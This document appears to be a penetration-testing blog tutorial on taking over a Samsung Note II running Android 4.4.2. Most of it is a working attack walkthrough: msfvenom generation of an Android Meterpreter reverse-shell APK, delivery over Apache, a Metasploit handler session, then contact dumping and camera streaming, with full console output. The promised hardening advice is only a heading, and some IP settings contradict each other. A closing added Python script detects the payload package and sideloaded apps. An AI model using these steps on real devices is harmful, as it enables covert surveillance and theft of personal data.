Exploiting Samsung Note II N7100 Running Android KitKat 4.4.2


This article offers an in-depth technical exploration of exploiting a Samsung Note II N7100 device running Android KitKat 4.4.2 using advanced penetration testing techniques with Kali Linux.

Initial Setup and Configuration

Begin by setting up the network environment and initiating necessary services on Kali Linux to prepare for the exploitation process.

Creating and Deploying the Malicious APK

Utilize msfvenom to create a custom Android Meterpreter payload, and deploy it to the target device via an Apache server.

Establishing a Meterpreter Session

Configure and execute the multi-handler exploit in Metasploit to establish a Meterpreter session with the target Samsung Note II device.

Exploring Meterpreter's Capabilities

Dive into the various functionalities of the Meterpreter shell, from file system access to real-time camera streaming, highlighting the extent of control gained.

Securing Android Devices Against Such Exploits

Conclude with recommendations and best practices for securing Android devices against such vulnerabilities, emphasizing the importance of regular updates and security patches.

• Android IP address: 192.168.22.167
• Host IP address: 192.168.22.20
• Kali IP address: 192.168.22.59
• On Kali terminal 1, start apache2: # sudo service apache2 start
• If you want to enable any service permanently: To enable: # systemctl enable apache2 | To disable: # systemctl disable apache2
• On the Kali terminal, check the service status:
  ┌──(mrhacker㉿kali)-[/var/www/html]
  └─$ sudo service apache2 status
  ● apache2.service - The Apache HTTP Server
       Loaded: loaded (/lib/systemd/system/apache2.service; disabled; vendor preset: disabled)
       Active: active (running) since Thu 2021-08-19 07:31:40 EDT; 6s ago
• On the host browser, check the status: http://192.168.22.59/index.html
• On Kali terminal 2: $ msfvenom --help
  MsfVenom - a Metasploit standalone payload generator.
• On Kali terminal 1:
  ┌──(mrhacker㉿kali)-[~/Desktop]
  └─$ sudo msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.22.59 LPORT=4444 R > /home/mrhacker/Desktop/androidApp.apk
  [sudo] password for mrhacker:
  [-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
  [-] No arch selected, selecting arch: dalvik from the payload
  No encoder specified, outputting raw payload
  Payload size: 10191 bytes
• On Kali terminal 1: cp -p androidApp.apk /var/www/html/
• On the Android phone, in the browser: http://192.168.22.167/androidApp.apk
• On Kali terminal 2: $ msfconsole
• msf6 > use exploit/multi/handler
  [*] Using configured payload generic/shell_reverse_tcp
  msf6 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
  payload => android/meterpreter/reverse_tcp
  msf6 exploit(multi/handler) > show options
• msf6 exploit(multi/handler) > set LHOST 192.168.22.167
  LHOST => 192.168.22.167
• msf6 exploit(multi/handler) > exploit
  [-] Handler failed to bind to 192.168.22.167:4444:-  -
  [*] Started reverse TCP handler on 0.0.0.0:4444
  [*] Sending stage (77002 bytes) to 192.168.22.167
  [*] Meterpreter session 1 opened (192.168.22.59:4444 -> 192.168.22.167:39505) at 2021-08-19 07:59:07 -0400
  meterpreter > background
• msf6 exploit(multi/handler) > sessions
• msf6 exploit(multi/handler) > sessions i 1
  Active sessions
  ===============
  Id  Name  Type                        Information          Connection
  --  ----  ----                        -----------          ----------
  1         meterpreter dalvik/android  u0_a209 @ localhost  192.168.22.59:4444 -> 192.168.22.167:39505 (192.168.22.167)
  msf6 exploit(multi/handler) > help
• msf6 exploit(multi/handler) > sessions -i 1
  [*] Starting interaction with 1...
  meterpreter > pwd
  /data/data/com.metasploit.stage/files

meterpreter > ls -al
Listing: /
==========

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
40554/r-xr-xr--   0     dir   2021-08-18 13:11:50 -0400  acct
40000/---------   4096  dir   2021-08-19 07:43:24 -0400  cache
40000/---------   0     dir   2021-08-18 13:11:50 -0400  config
40554/r-xr-xr--   0     dir   1969-12-31 19:00:00 -0500  d
….
100444/r--r--r--  2166  fil   1969-12-31 19:00:00 -0500  ueventd.smdk4x12.rc
40554/r-xr-xr--   4096  dir   2016-06-08 10:29:50 -0400  vendor

meterpreter > app_list
Application List
================

Name                           Package                                            Running  IsSystem
----                           -------                                            -------  --------
AASAservice                    com.samsung.aasaservice                            false    true
Active applications            com.sec.android.widgetapp.activeapplicationwidget  true     true
Adapt Sound                    com.sec.hearingadjust                              false    true
AllShare ControlShare Service  com.sec.android.allshare.service.controlshare      false    true
AllShare FileShare Service     com.sec.android.allshare.service.fileshare         false    true
Android System                 android                                            false    true
….
com.sec.phone                  com.sec.phone                                      false    true
ringtonebackup                 com.sec.android.app.ringtoneBR                     false    true
wssyncmlnps                    com.wssnps                                         false    true

meterpreter > dump_contacts
[*] Fetching 1 contact into list
[*] Contacts list saved to: contacts_dump_20210819081459.txt
meterpreter > camera_stream
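
On the defensive side, the pwd output above shows the payload running as the package com.metasploit.stage, installed from a browser download rather than an app store. The Python script below is an added example, not part of the original article: it audits the output of `adb shell pm list packages -3 -i` for that package name and for third-party apps without a trusted installer. The sample listing is constructed, and the trusted-installer set and the exact line format are assumptions to adjust for your devices.

```python
import re

# Package name the payload in the session above runs under (from the pwd output).
KNOWN_BAD = {"com.metasploit.stage"}

# Assumption: installers this fleet trusts (Play Store, Samsung's store);
# add your MDM agent's package name if it installs apps.
TRUSTED_INSTALLERS = {"com.android.vending", "com.sec.android.app.samsungapps"}

# Assumed line format of `pm list packages -3 -i`:
#   package:<name>  installer=<installer package or null>
LINE_RE = re.compile(r"^package:(?P<pkg>\S+)\s+installer=(?P<installer>\S+)$")


def audit_packages(listing: str):
    """Return (package, reason) findings for a third-party package listing."""
    findings = []
    for raw in listing.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue  # skip blank or unrecognised lines
        pkg, installer = m["pkg"], m["installer"]
        if pkg in KNOWN_BAD:
            findings.append((pkg, "default Metasploit stage package name"))
        elif installer not in TRUSTED_INSTALLERS:
            # installer=null means the APK was sideloaded ("Unknown sources")
            findings.append((pkg, f"sideloaded (installer={installer})"))
    return findings


# Constructed sample listing, not captured from the device in the article.
SAMPLE = """\
package:com.whatsapp  installer=com.android.vending
package:com.metasploit.stage  installer=null
package:org.example.notes  installer=null
package:com.sec.example.tool  installer=com.sec.android.app.samsungapps
"""

if __name__ == "__main__":
    for pkg, reason in audit_packages(SAMPLE):
        print(f"{pkg}: {reason}")
```

The package-name match only catches an unmodified payload; the installer check is the part that generalizes, and keeping "Unknown sources" disabled prevents the install in the first place.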

Cogeanu Marius (https://cogeanu.com)